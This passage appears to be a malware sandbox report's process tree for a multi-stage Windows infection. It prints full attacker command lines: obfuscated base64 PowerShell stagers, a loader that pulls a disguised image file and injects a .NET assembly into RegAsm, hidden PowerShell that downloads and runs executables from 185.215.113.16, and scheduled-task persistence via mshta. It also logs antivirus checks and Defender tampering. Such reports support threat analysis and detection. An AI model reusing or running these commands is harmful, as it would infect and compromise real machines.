I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3540 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- System Location Discovery: System Language Discovery
PID:1480
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp"C:\Users\Admin\AppData\Local\Temp\is-U7AVN.tmp\LCESjzR.tmp" /SL5="$E01C6,14491362,830464,C:\Users\Admin\AppData\Local\Temp\1052838001\LCESjzR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3272 -
C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe"C:\Users\Admin\AppData\Local\Temp\is-93EA8.tmp\driver3.exe"5⤵
- Drops startup file
- Executes dropped EXE
PID:5044 -
C:\Users\Admin\AppData\Roaming\update\client32.exe"C:\Users\Admin\AppData\Roaming\update\client32.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe"C:\Users\Admin\AppData\Local\Temp\1052869101\a19ddbcf22.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:4036 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 9kU9rmaI6MC /tr "mshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:852
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\2Y2JBMsUI.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3740 -
C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE"C:\Users\Admin\AppData\Local\TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4028
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:2276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1052870021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:4400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1940
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "mCP7pma47aS" /tr "mshta \"C:\Temp\Qnd7Nib1E.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2056
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\Qnd7Nib1E.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4644
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe"C:\Users\Admin\AppData\Local\Temp\1052883001\1400d853a7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe"C:\Users\Admin\AppData\Local\Temp\1052895001\2cbf0a74ae.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4140 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67938ad15f2a9.vbs4⤵
- Checks computer location settings
- Modifies registry class
PID:4796 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67938ad15f2a9.vbs"5⤵
- Checks computer location settings
PID:964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec6⤵
- Command and Scripting Interpreter: PowerShell
PID:4724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'http://uptodatesystem.com/test/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.ikfkhSk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
PID:2912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:4568
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:4872
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe"C:\Users\Admin\AppData\Local\Temp\1052896001\fdd227d667.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe"C:\Users\Admin\AppData\Local\Temp\1052897001\0f7cec18a3.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4660 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe"C:\Users\Admin\AppData\Local\Temp\1052898001\df2fa3eeb4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe"C:\Users\Admin\AppData\Local\Temp\1052899001\32c0c97ccb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:628
-
-
C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe"C:\Users\Admin\AppData\Local\Temp\1052900001\d1253bb531.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:3064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd4⤵PID:1288
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4852
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\findstr.exefindstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"5⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7646615⤵PID:2432
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Fm5⤵
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "Tunnel" Addresses5⤵
- System Location Discovery: System Language Discovery
PID:1384
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com5⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F5⤵
- System Location Discovery: System Language Discovery
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.comMacromedia.com F5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2460
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:3832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe"C:\Users\Admin\AppData\Local\Temp\1052901001\b226bb76a2.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1028
-
-
C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe"C:\Users\Admin\AppData\Local\Temp\1052902001\9ebca9cb64.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1172
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4960
-
C:\Users\Admin\AppData\Local\dllhost.exeC:\Users\Admin\AppData\Local\dllhost.exe1⤵
- Executes dropped EXE
PID:772
-
C:\Windows\system32\regsvr32.EXEC:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv1⤵
- Loads dropped DLL
PID:3736 -
